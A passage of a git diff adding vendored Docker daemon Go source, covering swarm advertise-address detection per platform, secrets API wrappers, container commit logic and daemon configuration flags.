+				// IPv4
+
+				// Ignore addresses in subnets that are managed by Docker.
+				for _, subnet := range v4Subnets {
+					if subnet.Contains(ipAddr.IP) {
+						continue ifaceLoop
+					}
+				}
+
+				if interfaceAddr4 != nil {
+					return nil, errMultipleIPs(intf.Name, intf.Name, interfaceAddr4, ipAddr.IP)
+				}
+
+				interfaceAddr4 = ipAddr.IP
+			} else {
+				// IPv6
+
+				// Ignore addresses in subnets that are managed by Docker.
+				for _, subnet := range v6Subnets {
+					if subnet.Contains(ipAddr.IP) {
+						continue ifaceLoop
+					}
+				}
+
+				if interfaceAddr6 != nil {
+					return nil, errMultipleIPs(intf.Name, intf.Name, interfaceAddr6, ipAddr.IP)
+				}
+
+				interfaceAddr6 = ipAddr.IP
+			}
+		}
+
+		// In the case that this interface has exactly one IPv4 address
+		// and exactly one IPv6 address, favor IPv4 over IPv6.
+		if interfaceAddr4 != nil {
+			if systemAddr != nil {
+				return nil, errMultipleIPs(systemInterface, intf.Name, systemAddr, interfaceAddr4)
+			}
+			systemAddr = interfaceAddr4
+			systemInterface = intf.Name
+		} else if interfaceAddr6 != nil {
+			if systemAddr != nil {
+				return nil, errMultipleIPs(systemInterface, intf.Name, systemAddr, interfaceAddr6)
+			}
+			systemAddr = interfaceAddr6
+			systemInterface = intf.Name
+		}
+	}
+
+	if systemAddr == nil {
+		return nil, errNoIP
+	}
+
+	return systemAddr, nil
+}
+
+func listSystemIPs() []net.IP {
+	interfaces, err := net.Interfaces()
+	if err != nil {
+		return nil
+	}
+
+	var systemAddrs []net.IP
+
+	for _, intf := range interfaces {
+		addrs, err := intf.Addrs()
+		if err != nil {
+			continue
+		}
+
+		for _, addr := range addrs {
+			ipAddr, ok := addr.(*net.IPNet)
+
+			if ok {
+				systemAddrs = append(systemAddrs, ipAddr.IP)
+			}
+		}
+	}
+
+	return systemAddrs
+}
+
+func errMultipleIPs(interfaceA, interfaceB string, addrA, addrB net.IP) error {
+	if interfaceA == interfaceB {
+		return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB)
+	}
+	return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB)
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go
new file mode 100644
index 0000000000..3d4f239bda
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go
@@ -0,0 +1,91 @@
+// +build linux
+
+package cluster
+
+import (
+	"net"
+
+	"github.com/vishvananda/netlink"
+)
+
+func (c *Cluster) resolveSystemAddr() (net.IP, error) {
+	// Use the system's only device IP address, or fail if there are
+	// multiple addresses to choose from.
+	interfaces, err := netlink.LinkList()
+	if err != nil {
+		return nil, err
+	}
+
+	var (
+		systemAddr      net.IP
+		systemInterface string
+		deviceFound     bool
+	)
+
+	for _, intf := range interfaces {
+		// Skip non device or inactive interfaces
+		if intf.Type() != "device" || intf.Attrs().Flags&net.FlagUp == 0 {
+			continue
+		}
+
+		addrs, err := netlink.AddrList(intf, netlink.FAMILY_ALL)
+		if err != nil {
+			continue
+		}
+
+		var interfaceAddr4, interfaceAddr6 net.IP
+
+		for _, addr := range addrs {
+			ipAddr := addr.IPNet.IP
+
+			// Skip loopback and link-local addresses
+			if !ipAddr.IsGlobalUnicast() {
+				continue
+			}
+
+			// At least one non-loopback device is found and it is administratively up
+			deviceFound = true
+
+			if ipAddr.To4() != nil {
+				if interfaceAddr4 != nil {
+					return nil, errMultipleIPs(intf.Attrs().Name, intf.Attrs().Name, interfaceAddr4, ipAddr)
+				}
+				interfaceAddr4 = ipAddr
+			} else {
+				if interfaceAddr6 != nil {
+					return nil, errMultipleIPs(intf.Attrs().Name, intf.Attrs().Name, interfaceAddr6, ipAddr)
+				}
+				interfaceAddr6 = ipAddr
+			}
+		}
+
+		// In the case that this interface has exactly one IPv4 address
+		// and exactly one IPv6 address, favor IPv4 over IPv6.
+		if interfaceAddr4 != nil {
+			if systemAddr != nil {
+				return nil, errMultipleIPs(systemInterface, intf.Attrs().Name, systemAddr, interfaceAddr4)
+			}
+			systemAddr = interfaceAddr4
+			systemInterface = intf.Attrs().Name
+		} else if interfaceAddr6 != nil {
+			if systemAddr != nil {
+				return nil, errMultipleIPs(systemInterface, intf.Attrs().Name, systemAddr, interfaceAddr6)
+			}
+			systemAddr = interfaceAddr6
+			systemInterface = intf.Attrs().Name
+		}
+	}
+
+	if systemAddr == nil {
+		if !deviceFound {
+			// If no non-loopback device type interface is found,
+			// fall back to the regular auto-detection mechanism.
+			// This is to cover the case where docker is running
+			// inside a container (eths are in fact veths).
+			return c.resolveSystemAddrViaSubnetCheck()
+		}
+		return nil, errNoIP
+	}
+
+	return systemAddr, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go
new file mode 100644
index 0000000000..4e845f5c8f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go
@@ -0,0 +1,9 @@
+// +build !linux,!solaris
+
+package cluster
+
+import "net"
+
+func (c *Cluster) resolveSystemAddr() (net.IP, error) {
+	return c.resolveSystemAddrViaSubnetCheck()
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go
new file mode 100644
index 0000000000..57a894b251
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go
@@ -0,0 +1,57 @@
+package cluster
+
+import (
+	"bufio"
+	"fmt"
+	"net"
+	"os/exec"
+	"strings"
+)
+
+func (c *Cluster) resolveSystemAddr() (net.IP, error) {
+	defRouteCmd := "/usr/sbin/ipadm show-addr -p -o addr " +
+		"`/usr/sbin/route get default | /usr/bin/grep interface | " +
+		"/usr/bin/awk '{print $2}'`"
+	out, err := exec.Command("/usr/bin/bash", "-c", defRouteCmd).Output()
+	if err != nil {
+		return nil, fmt.Errorf("cannot get default route: %v", err)
+	}
+
+	defInterface := strings.SplitN(string(out), "/", 2)
+	defInterfaceIP := net.ParseIP(defInterface[0])
+
+	return defInterfaceIP, nil
+}
+
+func listSystemIPs() []net.IP {
+	var systemAddrs []net.IP
+	cmd := exec.Command("/usr/sbin/ipadm", "show-addr", "-p", "-o", "addr")
+	cmdReader, err := cmd.StdoutPipe()
+	if err != nil {
+		return nil
+	}
+
+	if err := cmd.Start(); err != nil {
+		return nil
+	}
+
+	scanner := bufio.NewScanner(cmdReader)
+	go func() {
+		for scanner.Scan() {
+			text := scanner.Text()
+			nameAddrPair := strings.SplitN(text, "/", 2)
+			// Let go of loopback interfaces and docker interfaces
+			systemAddrs = append(systemAddrs, net.ParseIP(nameAddrPair[0]))
+		}
+	}()
+
+	if err := scanner.Err(); err != nil {
+		fmt.Printf("scan underwent err: %+v\n", err)
+	}
+
+	if err := cmd.Wait(); err != nil {
+		fmt.Printf("run command wait: %+v\n", err)
+	}
+
+	return systemAddrs
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go
new file mode 100644
index 0000000000..f4c72ae13b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go
@@ -0,0 +1,37 @@
+package provider
+
+import "github.com/docker/docker/api/types"
+
+// NetworkCreateRequest is a request when creating a network.
+type NetworkCreateRequest struct {
+	ID string
+	types.NetworkCreateRequest
+}
+
+// NetworkCreateResponse is a response when creating a network.
+type NetworkCreateResponse struct {
+	ID string `json:"Id"`
+}
+
+// VirtualAddress represents a virtual address.
+type VirtualAddress struct {
+	IPv4 string
+	IPv6 string
+}
+
+// PortConfig represents a port configuration.
+type PortConfig struct {
+	Name          string
+	Protocol      int32
+	TargetPort    uint32
+	PublishedPort uint32
+}
+
+// ServiceConfig represents a service configuration.
+type ServiceConfig struct {
+	ID               string
+	Name             string
+	Aliases          map[string][]string
+	VirtualAddresses map[string]*VirtualAddress
+	ExposedPorts     []*PortConfig
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/secrets.go b/vendor/github.com/docker/docker/daemon/cluster/secrets.go
new file mode 100644
index 0000000000..2b9eb5da1d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/secrets.go
@@ -0,0 +1,133 @@
+package cluster
+
+import (
+	apitypes "github.com/docker/docker/api/types"
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	swarmapi "github.com/docker/swarmkit/api"
+)
+
+// GetSecret returns a secret from a managed swarm cluster
+func (c *Cluster) GetSecret(id string) (types.Secret, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return types.Secret{}, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := c.node.client.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: id})
+	if err != nil {
+		return types.Secret{}, err
+	}
+
+	return convert.SecretFromGRPC(r.Secret), nil
+}
+
+// GetSecrets returns all secrets of a managed swarm cluster.
+func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return nil, c.errNoManager()
+	}
+
+	filters, err := newListSecretsFilters(options.Filters)
+	if err != nil {
+		return nil, err
+	}
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := c.node.client.ListSecrets(ctx,
+		&swarmapi.ListSecretsRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	secrets := []types.Secret{}
+
+	for _, secret := range r.Secrets {
+		secrets = append(secrets, convert.SecretFromGRPC(secret))
+	}
+
+	return secrets, nil
+}
+
+// CreateSecret creates a new secret in a managed swarm cluster.
+func (c *Cluster) CreateSecret(s types.SecretSpec) (string, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return "", c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	secretSpec := convert.SecretSpecToGRPC(s)
+
+	r, err := c.node.client.CreateSecret(ctx,
+		&swarmapi.CreateSecretRequest{Spec: &secretSpec})
+	if err != nil {
+		return "", err
+	}
+
+	return r.Secret.ID, nil
+}
+
+// RemoveSecret removes a secret from a managed swarm cluster.
+func (c *Cluster) RemoveSecret(id string) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	req := &swarmapi.RemoveSecretRequest{
+		SecretID: id,
+	}
+
+	if _, err := c.node.client.RemoveSecret(ctx, req); err != nil {
+		return err
+	}
+	return nil
+}
+
+// UpdateSecret updates a secret in a managed swarm cluster.
+// Note: this is not exposed to the CLI but is available from the API only
+func (c *Cluster) UpdateSecret(id string, version uint64, spec types.SecretSpec) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	secretSpec := convert.SecretSpecToGRPC(spec)
+
+	if _, err := c.client.UpdateSecret(ctx,
+		&swarmapi.UpdateSecretRequest{
+			SecretID: id,
+			SecretVersion: &swarmapi.Version{
+				Index: version,
+			},
+			Spec: &secretSpec,
+		}); err != nil {
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/commit.go b/vendor/github.com/docker/docker/daemon/commit.go
new file mode 100644
index 0000000000..1e7bffb1dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/commit.go
@@ -0,0 +1,271 @@
+package daemon
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"runtime"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/backend"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder/dockerfile"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/reference"
+)
+
+// merge merges two Config, the image container configuration (defaults values),
+// and the user container configuration, either passed by the API or generated
+// by the cli.
+// It will mutate the specified user configuration (userConf) with the image
+// configuration where the user configuration is incomplete.
+func merge(userConf, imageConf *containertypes.Config) error {
+	if userConf.User == "" {
+		userConf.User = imageConf.User
+	}
+	if len(userConf.ExposedPorts) == 0 {
+		userConf.ExposedPorts = imageConf.ExposedPorts
+	} else if imageConf.ExposedPorts != nil {
+		for port := range imageConf.ExposedPorts {
+			if _, exists := userConf.ExposedPorts[port]; !exists {
+				userConf.ExposedPorts[port] = struct{}{}
+			}
+		}
+	}
+
+	if len(userConf.Env) == 0 {
+		userConf.Env = imageConf.Env
+	} else {
+		for _, imageEnv := range imageConf.Env {
+			found := false
+			imageEnvKey := strings.Split(imageEnv, "=")[0]
+			for _, userEnv := range userConf.Env {
+				userEnvKey := strings.Split(userEnv, "=")[0]
+				if runtime.GOOS == "windows" {
+					// Case insensitive environment variables on Windows
+					imageEnvKey = strings.ToUpper(imageEnvKey)
+					userEnvKey = strings.ToUpper(userEnvKey)
+				}
+				if imageEnvKey == userEnvKey {
+					found = true
+					break
+				}
+			}
+			if !found {
+				userConf.Env = append(userConf.Env, imageEnv)
+			}
+		}
+	}
+
+	if userConf.Labels == nil {
+		userConf.Labels = map[string]string{}
+	}
+	for l, v := range imageConf.Labels {
+		if _, ok := userConf.Labels[l]; !ok {
+			userConf.Labels[l] = v
+		}
+	}
+
+	if len(userConf.Entrypoint) == 0 {
+		if len(userConf.Cmd) == 0 {
+			userConf.Cmd = imageConf.Cmd
+			userConf.ArgsEscaped = imageConf.ArgsEscaped
+		}
+
+		if userConf.Entrypoint == nil {
+			userConf.Entrypoint = imageConf.Entrypoint
+		}
+	}
+	if imageConf.Healthcheck != nil {
+		if userConf.Healthcheck == nil {
+			userConf.Healthcheck = imageConf.Healthcheck
+		} else {
+			if len(userConf.Healthcheck.Test) == 0 {
+				userConf.Healthcheck.Test = imageConf.Healthcheck.Test
+			}
+			if userConf.Healthcheck.Interval == 0 {
+				userConf.Healthcheck.Interval = imageConf.Healthcheck.Interval
+			}
+			if userConf.Healthcheck.Timeout == 0 {
+				userConf.Healthcheck.Timeout = imageConf.Healthcheck.Timeout
+			}
+			if userConf.Healthcheck.Retries == 0 {
+				userConf.Healthcheck.Retries = imageConf.Healthcheck.Retries
+			}
+		}
+	}
+
+	if userConf.WorkingDir == "" {
+		userConf.WorkingDir = imageConf.WorkingDir
+	}
+	if len(userConf.Volumes) == 0 {
+		userConf.Volumes = imageConf.Volumes
+	} else {
+		for k, v := range imageConf.Volumes {
+			userConf.Volumes[k] = v
+		}
+	}
+
+	if userConf.StopSignal == "" {
+		userConf.StopSignal = imageConf.StopSignal
+	}
+	return nil
+}
+
+// Commit creates a new filesystem image from the current state of a container.
+// The image can optionally be tagged into a repository.
+func (daemon *Daemon) Commit(name string, c *backend.ContainerCommitConfig) (string, error) {
+	start := time.Now()
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return "", err
+	}
+
+	// It is not possible to commit a running container on Windows and on Solaris.
+	if (runtime.GOOS == "windows" || runtime.GOOS == "solaris") && container.IsRunning() {
+		return "", fmt.Errorf("%+v does not support commit of a running container", runtime.GOOS)
+	}
+
+	if c.Pause && !container.IsPaused() {
+		daemon.containerPause(container)
+		defer daemon.containerUnpause(container)
+	}
+
+	newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes)
+	if err != nil {
+		return "", err
+	}
+
+	if c.MergeConfigs {
+		if err := merge(newConfig, container.Config); err != nil {
+			return "", err
+		}
+	}
+
+	rwTar, err := daemon.exportContainerRw(container)
+	if err != nil {
+		return "", err
+	}
+	defer func() {
+		if rwTar != nil {
+			rwTar.Close()
+		}
+	}()
+
+	var history []image.History
+	rootFS := image.NewRootFS()
+	osVersion := ""
+	var osFeatures []string
+
+	if container.ImageID != "" {
+		img, err := daemon.imageStore.Get(container.ImageID)
+		if err != nil {
+			return "", err
+		}
+		history = img.History
+		rootFS = img.RootFS
+		osVersion = img.OSVersion
+		osFeatures = img.OSFeatures
+	}
+
+	l, err := daemon.layerStore.Register(rwTar, rootFS.ChainID())
+	if err != nil {
+		return "", err
+	}
+	defer layer.ReleaseAndLog(daemon.layerStore, l)
+
+	h := image.History{
+		Author:     c.Author,
+		Created:    time.Now().UTC(),
+		CreatedBy:  strings.Join(container.Config.Cmd, " "),
+		Comment:    c.Comment,
+		EmptyLayer: true,
+	}
+
+	if diffID := l.DiffID(); layer.DigestSHA256EmptyTar != diffID {
+		h.EmptyLayer = false
+		rootFS.Append(diffID)
+	}
+
+	history = append(history, h)
+
+	config, err := json.Marshal(&image.Image{
+		V1Image: image.V1Image{
+			DockerVersion:   dockerversion.Version,
+			Config:          newConfig,
+			Architecture:    runtime.GOARCH,
+			OS:              runtime.GOOS,
+			Container:       container.ID,
+			ContainerConfig: *container.Config,
+			Author:          c.Author,
+			Created:         h.Created,
+		},
+		RootFS:     rootFS,
+		History:    history,
+		OSFeatures: osFeatures,
+		OSVersion:  osVersion,
+	})
+
+	if err != nil {
+		return "", err
+	}
+
+	id, err := daemon.imageStore.Create(config)
+	if err != nil {
+		return "", err
+	}
+
+	if container.ImageID != "" {
+		if err := daemon.imageStore.SetParent(id, container.ImageID); err != nil {
+			return "", err
+		}
+	}
+
+	imageRef := ""
+	if c.Repo != "" {
+		newTag, err := reference.WithName(c.Repo) // todo: should move this to API layer
+		if err != nil {
+			return "", err
+		}
+		if c.Tag != "" {
+			if newTag, err = reference.WithTag(newTag, c.Tag); err != nil {
+				return "", err
+			}
+		}
+		if err := daemon.TagImageWithReference(id, newTag); err != nil {
+			return "", err
+		}
+		imageRef = newTag.String()
+	}
+
+	attributes := map[string]string{
+		"comment":  c.Comment,
+		"imageID":  id.String(),
+		"imageRef": imageRef,
+	}
+	daemon.LogContainerEventWithAttributes(container, "commit", attributes)
+	containerActions.WithValues("commit").UpdateSince(start)
+	return id.String(), nil
+}
+
+func (daemon *Daemon) exportContainerRw(container *container.Container) (io.ReadCloser, error) {
+	if err := daemon.Mount(container); err != nil {
+		return nil, err
+	}
+
+	archive, err := container.RWLayer.TarStream()
+	if err != nil {
+		daemon.Unmount(container) // logging is already handled in the `Unmount` function
+		return nil, err
+	}
+	return ioutils.NewReadCloserWrapper(archive, func() error {
+			archive.Close()
+			return container.RWLayer.Unmount()
+		}),
+		nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/config.go b/vendor/github.com/docker/docker/daemon/config.go
new file mode 100644
index 0000000000..42ef18f74a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config.go
@@ -0,0 +1,525 @@
+package daemon
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"runtime"
+	"strings"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/discovery"
+	"github.com/docker/docker/registry"
+	"github.com/imdario/mergo"
+	"github.com/spf13/pflag"
+)
+
+const (
+	// defaultMaxConcurrentDownloads is the default value for
+	// maximum number of downloads that
+	// may take place at a time for each pull.
+	defaultMaxConcurrentDownloads = 3
+	// defaultMaxConcurrentUploads is the default value for
+	// maximum number of uploads that
+	// may take place at a time for each push.
+	defaultMaxConcurrentUploads = 5
+	// stockRuntimeName is the reserved name/alias used to represent the
+	// OCI runtime being shipped with the docker daemon package.
+	stockRuntimeName = "runc"
+)
+
+const (
+	defaultNetworkMtu    = 1500
+	disableNetworkBridge = "none"
+)
+
+const (
+	defaultShutdownTimeout = 15
+)
+
+// flatOptions contains configuration keys
+// that MUST NOT be parsed as deep structures.
+// Use this to differentiate these options
+// with others like the ones in CommonTLSOptions.
+var flatOptions = map[string]bool{
+	"cluster-store-opts": true,
+	"log-opts":           true,
+	"runtimes":           true,
+	"default-ulimits":    true,
+}
+
+// LogConfig represents the default log configuration.
+// It includes json tags to deserialize configuration from a file
+// using the same names that the flags in the command line use.
+type LogConfig struct {
+	Type   string            `json:"log-driver,omitempty"`
+	Config map[string]string `json:"log-opts,omitempty"`
+}
+
+// commonBridgeConfig stores all the platform-common bridge driver specific
+// configuration.
+type commonBridgeConfig struct {
+	Iface     string `json:"bridge,omitempty"`
+	FixedCIDR string `json:"fixed-cidr,omitempty"`
+}
+
+// CommonTLSOptions defines TLS configuration for the daemon server.
+// It includes json tags to deserialize configuration from a file
+// using the same names that the flags in the command line use.
+type CommonTLSOptions struct {
+	CAFile   string `json:"tlscacert,omitempty"`
+	CertFile string `json:"tlscert,omitempty"`
+	KeyFile  string `json:"tlskey,omitempty"`
+}
+
+// CommonConfig defines the configuration of a docker daemon which is
+// common across platforms.
+// It includes json tags to deserialize configuration from a file
+// using the same names that the flags in the command line use.
+type CommonConfig struct {
+	AuthorizationPlugins []string            `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins
+	AutoRestart          bool                `json:"-"`
+	Context              map[string][]string `json:"-"`
+	DisableBridge        bool                `json:"-"`
+	DNS                  []string            `json:"dns,omitempty"`
+	DNSOptions           []string            `json:"dns-opts,omitempty"`
+	DNSSearch            []string            `json:"dns-search,omitempty"`
+	ExecOptions          []string            `json:"exec-opts,omitempty"`
+	GraphDriver          string              `json:"storage-driver,omitempty"`
+	GraphOptions         []string            `json:"storage-opts,omitempty"`
+	Labels               []string            `json:"labels,omitempty"`
+	Mtu                  int                 `json:"mtu,omitempty"`
+	Pidfile              string              `json:"pidfile,omitempty"`
+	RawLogs              bool                `json:"raw-logs,omitempty"`
+	Root                 string              `json:"graph,omitempty"`
+	SocketGroup          string              `json:"group,omitempty"`
+	TrustKeyPath         string              `json:"-"`
+	CorsHeaders          string              `json:"api-cors-header,omitempty"`
+	EnableCors           bool                `json:"api-enable-cors,omitempty"`
+
+	// LiveRestoreEnabled determines whether we should keep containers
+	// alive upon daemon shutdown/start
+	LiveRestoreEnabled bool `json:"live-restore,omitempty"`
+
+	// ClusterStore is the storage backend used for the cluster information. It is used by both
+	// multihost networking (to store networks and endpoints information) and by the node discovery
+	// mechanism.
+	ClusterStore string `json:"cluster-store,omitempty"`
+
+	// ClusterOpts is used to pass options to the discovery package for tuning libkv settings, such
+	// as TLS configuration settings.
+	ClusterOpts map[string]string `json:"cluster-store-opts,omitempty"`
+
+	// ClusterAdvertise is the network endpoint that the Engine advertises for the purpose of node
+	// discovery. This should be a 'host:port' combination on which that daemon instance is
+	// reachable by other hosts.
+	ClusterAdvertise string `json:"cluster-advertise,omitempty"`
+
+	// MaxConcurrentDownloads is the maximum number of downloads that
+	// may take place at a time for each pull.
+	MaxConcurrentDownloads *int `json:"max-concurrent-downloads,omitempty"`
+
+	// MaxConcurrentUploads is the maximum number of uploads that
+	// may take place at a time for each push.
+	MaxConcurrentUploads *int `json:"max-concurrent-uploads,omitempty"`
+
+	// ShutdownTimeout is the timeout value (in seconds) the daemon will wait for the container
+	// to stop when daemon is being shutdown
+	ShutdownTimeout int `json:"shutdown-timeout,omitempty"`
+
+	Debug     bool     `json:"debug,omitempty"`
+	Hosts     []string `json:"hosts,omitempty"`
+	LogLevel  string   `json:"log-level,omitempty"`
+	TLS       bool     `json:"tls,omitempty"`
+	TLSVerify bool     `json:"tlsverify,omitempty"`
+
+	// Embedded structs that allow config
+	// deserialization without the full struct.
+	CommonTLSOptions
+
+	// SwarmDefaultAdvertiseAddr is the default host/IP or network interface
+	// to use if a wildcard address is specified in the ListenAddr value
+	// given to the /swarm/init endpoint and no advertise address is
+	// specified.
+	SwarmDefaultAdvertiseAddr string `json:"swarm-default-advertise-addr"`
+	MetricsAddress            string `json:"metrics-addr"`
+
+	LogConfig
+	bridgeConfig // bridgeConfig holds bridge network specific configuration.
+	registry.ServiceOptions
+
+	reloadLock sync.Mutex
+	valuesSet  map[string]interface{}
+
+	Experimental bool `json:"experimental"` // Experimental indicates whether experimental features should be exposed or not
+}
+
+// InstallCommonFlags adds flags to the pflag.FlagSet to configure the daemon
+func (config *Config) InstallCommonFlags(flags *pflag.FlagSet) {
+	var maxConcurrentDownloads, maxConcurrentUploads int
+
+	config.ServiceOptions.InstallCliFlags(flags)
+
+	flags.Var(opts.NewNamedListOptsRef("storage-opts", &config.GraphOptions, nil), "storage-opt", "Storage driver options")
+	flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &config.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load")
+	flags.Var(opts.NewNamedListOptsRef("exec-opts", &config.ExecOptions, nil), "exec-opt", "Runtime execution options")
+	flags.StringVarP(&config.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file")
+	flags.StringVarP(&config.Root, "graph", "g", defaultGraph, "Root of the Docker runtime")
+	flags.BoolVarP(&config.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run")
+	flags.MarkDeprecated("restart", "Please use a restart policy on docker run")
+	flags.StringVarP(&config.GraphDriver, "storage-driver", "s", "", "Storage driver to use")
+	flags.IntVar(&config.Mtu, "mtu", 0, "Set the containers network MTU")
+	flags.BoolVar(&config.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring")
+	// FIXME: why the inconsistency between "hosts" and "sockets"?
+	flags.Var(opts.NewListOptsRef(&config.DNS, opts.ValidateIPAddress), "dns", "DNS server to use")
+	flags.Var(opts.NewNamedListOptsRef("dns-opts", &config.DNSOptions, nil), "dns-opt", "DNS options to use")
+	flags.Var(opts.NewListOptsRef(&config.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use")
+	flags.Var(opts.NewNamedListOptsRef("labels", &config.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon")
+	flags.StringVar(&config.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs")
+	flags.Var(opts.NewNamedMapOpts("log-opts", config.LogConfig.Config, nil), "log-opt", "Default log driver options for containers")
+	flags.StringVar(&config.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise")
+	flags.StringVar(&config.ClusterStore, "cluster-store", "", "URL of the distributed storage backend")
+	flags.Var(opts.NewNamedMapOpts("cluster-store-opts", config.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options")
+	flags.StringVar(&config.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API")
+	flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", defaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull")
+	flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", defaultMaxConcurrentUploads, "Set the max concurrent uploads for each push")
+	flags.IntVar(&config.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout")
+
+	flags.StringVar(&config.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address")
+	flags.BoolVar(&config.Experimental, "experimental", false, "Enable experimental features")
+
+	flags.StringVar(&config.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on")
+
+	config.MaxConcurrentDownloads = &maxConcurrentDownloads
+	config.MaxConcurrentUploads = &maxConcurrentUploads
+}
+
+// IsValueSet returns true if a configuration value
+// was explicitly set in the configuration file.
+func (config *Config) IsValueSet(name string) bool {
+	if config.valuesSet == nil {
+		return false
+	}
+	_, ok := config.valuesSet[name]
+	return ok
+}
+
+// NewConfig returns a new fully initialized Config struct
+func NewConfig() *Config {
+	config := Config{}
+	config.LogConfig.Config = make(map[string]string)
+	config.ClusterOpts = make(map[string]string)
+
+	if runtime.GOOS != "linux" {
+		config.V2Only = true
+	}
+	return &config
+}
+
+func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) {
+	if runtime.GOOS == "solaris" && (clusterAdvertise != "" || clusterStore != "") {
+		return "", errors.New("Cluster Advertise Settings not supported on Solaris")
+	}
+	if clusterAdvertise == "" {
+		return "", errDiscoveryDisabled
+	}
+	if clusterStore == "" {
+		return "", fmt.Errorf("invalid cluster configuration. --cluster-advertise must be accompanied by --cluster-store configuration")
+	}
+
+	advertise, err := discovery.ParseAdvertise(clusterAdvertise)
+	if err != nil {
+		return "", fmt.Errorf("discovery advertise parsing failed (%v)", err)
+	}
+	return advertise, nil
+}
+
+// GetConflictFreeLabels validate Labels for conflict
+// In swarm the duplicates for labels are removed
+// so we only take same values here, no conflict values
+// If the key-value is the same we will only take the last label
+func GetConflictFreeLabels(labels []string) ([]string, error) {
+	labelMap := map[string]string{}
+	for _, label := range labels {
+		stringSlice := strings.SplitN(label, "=", 2)
+		if len(stringSlice) > 1 {
+			// If there is a conflict we will return an error
+			if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] {
+				return nil, fmt.Errorf("conflict labels for %s=%s and %s=%s", stringSlice[0], stringSlice[1], stringSlice[0], v)
+			}
+			labelMap[stringSlice[0]] = stringSlice[1]
+		}
+	}
+
+	newLabels := []string{}
+	for k, v := range labelMap {
+		newLabels = append(newLabels, fmt.Sprintf("%s=%s", k, v))
+	}
+	return newLabels, nil
+}
+
+// ReloadConfiguration reads the configuration in the host and reloads the daemon and server.
+func ReloadConfiguration(configFile string, flags *pflag.FlagSet, reload func(*Config)) error {
+	logrus.Infof("Got signal to reload configuration, reloading from: %s", configFile)
+	newConfig, err := getConflictFreeConfiguration(configFile, flags)
+	if err != nil {
+		return err
+	}
+
+	if err := ValidateConfiguration(newConfig); err != nil {
